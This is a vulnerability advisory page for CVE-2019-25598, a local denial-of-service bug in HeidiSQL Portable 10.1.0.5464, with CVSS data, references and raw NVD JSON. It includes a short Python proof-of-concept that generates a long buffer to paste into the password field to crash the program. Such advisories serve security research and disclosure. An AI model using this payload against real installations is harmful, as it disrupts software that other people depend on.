CVE-2019-25598

Description

HeidiSQL Portable 10.1.0.5464 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the password field. Attackers can paste a buffer overflow payload into the password input during Microsoft SQL Server login to trigger an application crash.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

HeidiSQL Portable 10.1.0.5464

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import sys

# Proof of Concept (PoC) for CVE-2019-25598
# Description: Generates a long string buffer to crash HeidiSQL Portable 10.1.0.5464
# Usage: Run the script, copy the output, and paste it into the password field.

def generate_payload():
    # Create a buffer of 'A' characters. Size is arbitrary but large enough to trigger overflow.
    # 5000 bytes is typically sufficient to cause a DoS in this context.
    buffer_size = 5000
    payload = "A" * buffer_size
    return payload

if __name__ == "__main__":
    print("[+] Generating payload for CVE-2019-25598...")
    payload = generate_payload()
    print(f"[+] Payload length: {len(payload)}")
    print("[+] Copy the string below and paste it into the HeidiSQL password field:")
    print(payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25598
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25598
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25598/
[4] VulDB https://vuldb.com/cve/CVE-2019-25598
[5] https://www.exploit-db.com/exploits/46749
[6] https://www.heidisql.com/
[7] https://www.heidisql.com/downloads/releases/HeidiSQL_10.1_64_Portable.zip
[8] https://www.vulncheck.com/advisories/heidisql-portable-denial-of-service-via-buffer-overflow

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25598", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:26.990", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HeidiSQL Portable 10.1.0.5464 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the password field. Attackers can paste a buffer overflow payload into the password input during Microsoft SQL Server login to trigger an application crash."}, {"lang": "es", "value": "HeidiSQL Portable 10.1.0.5464 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales bloquear la aplicación al introducir una cadena excesivamente larga en el campo de la contraseña. Los atacantes pueden pegar una carga útil de desbordamiento de búfer en la entrada de la contraseña durante el inicio de sesión de Microsoft SQL Server para provocar un bloqueo de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/46749", "source": "[email protected]"}, {"url": "https://www.heidisql.com/", "source": "[email protected]"}, {"url": "https://www.heidisql.com/downloads/releases/HeidiSQL_10.1_64_Portable.zip", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/heidisql-portable-denial-of-service-via-buffer-overflow", "source": "[email protected]"}]}}